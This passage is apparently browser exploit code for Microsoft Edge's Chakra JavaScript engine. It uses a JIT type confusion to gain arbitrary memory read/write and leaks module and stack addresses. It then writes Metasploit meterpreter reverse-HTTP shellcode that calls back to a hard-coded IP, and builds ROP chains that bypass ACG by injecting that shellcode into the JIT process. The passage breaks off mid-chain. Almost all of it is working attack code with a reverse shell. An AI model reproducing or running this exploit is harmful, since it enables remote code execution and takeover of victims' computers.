    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// Store where our ROP chain begins
	ropBegin = countMe;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Confirm exploit 
	alert("[+] Press OK to enjoy the Meterpreter shell :)");

	// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
	jitHandle = read64(chakraLo+0x74d838, chakraHigh);

	// Helper function to be called after each stack write to increment offset to be written to
	function next()
	{
	    counter+=0x8;
	}

	// Begin ROP chain
	// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
	// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
	// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

	// DuplicateHandle() ROP chain
	// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
	// ACG is disabled in the JIT process
	// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

	// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

	// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

	// HANDLE hSourceHandle (RDX)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
	next();

	// HANDLE hTargetProcessHandle (R8)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();

	// LPHANDLE lpTargetHandle (R9)
	// This needs to be a writable address where the full JIT handle will be stored
	// Using .data section of chakra.dll in a part where there is no data
	/*
	0:053> dqs chakra+0x72E000+0x20010
	00007ffc`052ae010  00000000`00000000
	00007ffc`052ae018  00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hSourceProcessHandle (RCX)
	// Handle to the JIT process from the content process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
	next();

	// Call KERNELBASE!DuplicateHandle
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
	next();

	// VirtuaAllocEx() ROP chain
	// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

	// DWORD flAllocationType (R9)
	// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
	/*
	0:031> ? 0x00002000 | 0x00001000 
	Evaluate expression: 12288 = 00000000`00003000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// SIZE_T dwSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();

	// LPVOID lpAddress (RDX)
	// Let VirtualAllocEx decide where the memory will be located
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     				   // Recall RAX already has a writable pointer in it

	// Call KERNELBASE!VirtualAllocEx
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// WriteProcessMemory() ROP chain
	// Stage 3 -> Write our shellcode into the JIT process

	// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

	/*
	0:015> dq kernelbase+0x216000+0x4000 L2
	00007fff`58cfa000  00000000`00000000 00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
	next();

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
	next();
